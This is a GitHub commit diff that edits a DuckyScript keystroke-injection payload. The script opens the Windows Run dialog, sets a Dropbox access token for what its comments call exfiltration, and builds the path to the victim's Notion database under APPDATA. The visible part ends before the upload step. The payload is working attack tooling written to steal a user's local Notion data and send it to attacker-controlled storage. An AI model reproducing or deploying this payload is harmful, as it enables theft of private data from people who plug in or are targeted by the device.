Update payload.txt

pull/173/head
Kalani Helekunihi 2023-06-12 14:02:49 -04:00 committed by GitHub
parent d12271c1c5
commit 4f7713cda7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 6 deletions

View File

@ -15,7 +15,7 @@ REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE DROPBOX_ACCESS_TOKEN example
DEFINE #DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
@ -24,13 +24,10 @@ ENTER
DELAY 2000
REM Setting about exfiltration
STRING $accessToken = "
STRING DROPBOX_ACCESS_TOKEN
STRING "
ENTER
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
REM Settings about Notion DB
STRINGLN
STRINGLN_BLOCK
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"